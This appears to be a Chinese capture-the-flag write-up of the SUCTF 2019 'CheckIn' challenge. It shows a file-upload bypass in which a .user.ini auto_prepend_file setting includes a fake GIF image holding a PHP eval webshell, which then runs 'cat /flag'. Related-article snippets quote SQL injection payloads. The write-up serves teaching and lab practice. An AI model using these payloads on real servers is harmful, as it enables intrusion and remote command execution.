首页 > 其他分享 >[SUCTF 2019]CheckIn

[SUCTF 2019]CheckIn

时间:2024-07-29 15:56:40浏览次数:10  
标签:SUCTF 文件 string CheckIn jpg 2019 ini php user

[SUCTF 2019]CheckIn

Step

发现上传文件试验后,

Your dir uploads/40faad96d40fbac7603474024cbb933a
Your files :
array(5) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(9) ".user.ini" [3]=> string(5) "1.jpg" [4]=> string(9) "index.php" }

存在php执行文件,尝试利用.user.ini

于是上传.user.ini,内容:

GIF89a
auto_prepend_file=1.jpg

继续上传文件名为1.jpg的文件,内容:

GIF89a
<script language='php'>@eval($_GET['cmd'])</script>

(因为不方便用蚁剑)

url/uploads/40faad96d40fbac7603474024cbb933a/index.php?cmd=system("cat /flag");

得到flag

.user.ini

php.ini 文件是全局配置文件,影响整个服务器,而.htaccess 和 .user.ini 是目录的配置文件,是用户自定义的配置php.ini,可以构造后门。

.xxxx.ini 文件是配置当前目录以及当前子目录的规则配置的文件,文件的中的配置会覆盖掉当前php.ini中的规则,是当前用户的配置文件 # 除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的 PHP 文件所在目录开始一直上升到 web 根目录($_SERVER['DOCUMENT_ROOT'] 所指定的)。如果被执行的 PHP 文件在 web 根目录之外,则只扫描该目录。 # 如果是 Apache 服务器,则可以利用 .htaccess 文件,作用和 .INI 一样,只是风格上有些不一样

在 .user.ini 文件中配置

auto_prepend_file=test.png

上传1.jpg一句话木马

上传的目录中存在php执行文件,上传的一句话木马文件以及.user.ini 配置文件

当访问该目录下的php文件执行文件时,首先会调用.user.ini 使1.jpg包含到php文件内,然后执行php文件.

标签:SUCTF,文件,string,CheckIn,jpg,2019,ini,php,user
From: https://www.cnblogs.com/bolerat/p/18330292

相关文章

  • [极客大挑战 2019]BabySQL
    [极客大挑战2019]BabySQL首先映入眼帘的是一个非常经典的登录界面我们先尝试判断一下这是什么注入点输入个1'看看怎么个事发现输入的1'被双引号包裹,再次输入1"显示密码不匹配,输入1'or1=1--+万能密码试试这里应该是过滤了or和+,用空格代替+尝试下大小写绕过不行,最后发......
  • [极客大挑战 2019]HardSQL
    [极客大挑战2019]HardSQLStep尝试报错注入库名'or(updatexml(1,concat(0x7e,database()),0x7e))#表名'or(updatexml(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like(database())),0x7e),0))#列名'or(updatexml(1,co......
  • BUUCTF 6.[第五空间2019 决赛]PWN5 1
    拿到题目,先运行一下很明显地出现了一个重复我们的输入,以及一个判断的过程,那么我们可以猜测可能会有栈溢出漏洞,让我们继续保护是开了一个canary以及nx,大概率就不是栈溢出漏洞了,因为canary的存在会使栈溢出非常麻烦。我们看一下IDA存在栈溢出漏洞,但是由于长度不够,我们无法......
  • BUUCTF 4.ciscn_2019_n_1
    拿到题目首先先运行程序我们发现给了我们一个数字,我们猜测应该是一个条件判断的程序,然后我们检查一下保护机制我们发现只开了NX(不可执行)保护,那我们直接看IDA就行了。main函数只是设定了无缓冲模式,以及调用了一个func函数,然后我们看一下我们可以看到gets和我们想要的flag,......
  • [ZJCTF 2019]NiZhuanSiWei
    [ZJCTF2019]NiZhuanSiWeiStep1开靶机,获得php源码<?php$text=$_GET["text"];$file=$_GET["file"];$password=$_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcometothezjctf......
  • sqlserver2019--订阅发布
    一、连接数据库 1.查看sqlserver主机名称 2.通过SSMS工具连接sqlserver 二、发布1.复制--本地发布---右击选择新建发布 2.启动代理服务,为了防止自动启动失败,可以选择手动启动,然后去sqlserver服务器启动此服务 3.选择快照文件夹,如果是跨机器,需要共享文件夹(本次......
  • VP CSP-J2019 江西
    不是很理解为什么江西CSP单列一年,题目难度吊打CSP-J2024T1P5681[CSP-J2019江西]面积签到题,但需要注意面积相等情况#include<bits/stdc++.h>usingnamespacestd;typedeflonglongll;lla,b,c;intmain(){ cin>>a>>b>>c; if(a*a>b*c){ cout<<"Alice......
  • SQL Server 2019 中设置定时自动重启
    要在SQLServer2019中设置定时自动重启,可以使用Windows任务计划程序。下面是详细的步骤:步骤一:创建批处理文件打开记事本。输入以下内容:netstop"SQLServer(MSSQLSERVER)"netstart"SQLServer(MSSQLSERVER)"(如果使用的是命名实例,则需要将MSSQLSERVER替换为实......
  • 错误 1 error LNK2019: 无法解析的外部符号 _MQTTClient_create,该符号在函数 "protect
    前言全局说明错误1errorLNK2019:无法解析的外部符号_MQTTClient_create,该符号在函数"protected:virtualint__thiscallCmfc_mqttclientpoweronoffDlg::OnInitDialog(void)"(?OnInitDialog@Cmfc_mqttclientpoweronoffDlg@@MAEHXZ)中被引用一、说明环境:Windows1......
  • [SUCTF 2019]Pythonginx(url中的unicode漏洞引发的域名安全问题)
    @app.route('/getUrl',methods=['GET','POST'])defgetUrl():#从请求中获取url参数url=request.args.get("url")host=parse.urlparse(url).hostname#第一处检查主机名是否为'suctf.cc'ifhost=='s......